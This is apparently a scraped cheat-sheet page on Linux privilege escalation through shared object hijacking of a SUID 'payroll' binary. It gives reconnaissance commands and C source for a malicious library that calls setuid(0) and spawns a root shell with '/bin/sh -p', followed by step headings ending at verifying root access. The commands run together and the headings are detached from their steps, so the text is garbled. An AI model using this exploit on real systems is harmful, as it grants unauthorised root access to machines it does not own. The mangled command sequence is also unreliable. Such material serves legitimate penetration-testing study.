shared-object-hijacking
Shared objects hijacking
ldd payrollreadelf -d payroll | grep PATHls -la /folderldd payrollcp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so./payroll#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
void dbquery() {
printf("Malicious library loaded\n");
setuid(0);
system("/bin/sh -p");
}Check SETUID Binary Permissions
List Shared Object Dependencies
Check RUNPATH
List Directory Permissions
Copy Existing Library (to Identify Missing Symbol)
Run Binary (to Get Symbol Lookup Error)
Create Malicious Shared Object (src.c)
Compile Malicious Shared Object
Run Vulnerable Binary
Verify Root Access
Key Concepts:
Last updated